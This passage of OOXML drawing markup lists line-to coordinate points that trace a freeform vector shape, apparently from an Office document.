                      <a:pt x="1396" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1387" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1361" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1387" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1410" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1456" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1482" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1475" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1439" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1425" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1403" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1388" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1376" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1384" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1387" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1386" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1371" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1360" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1346" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1348" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1341" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1290" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1285" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1268" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1269" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1268" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1258" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1251" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1139" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1127" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1114" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1102" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1080" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1073" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1065" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1065" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1072" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1074" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1077" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1075" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1064" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1052" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1062" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1058" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1048" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1040" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1034" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1031" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1018" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1002" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="964" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="980" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="987" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="991" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="993" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1000" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1005" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1011" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1006" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1005" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1010" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1011" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1012" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1003" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1003" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="999" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="994" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="987" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="988" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="994" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1000" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="999" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="994" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="981" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="927" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="919" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="908" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="901" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="929" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="927" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="919" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="880" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="880" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="884" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="875" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="854" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="894" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="922" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="918" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="922" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="928" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="931" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="930" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="908" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="908" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="884" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="834" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="818" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="834" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="785" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="507"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="507"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
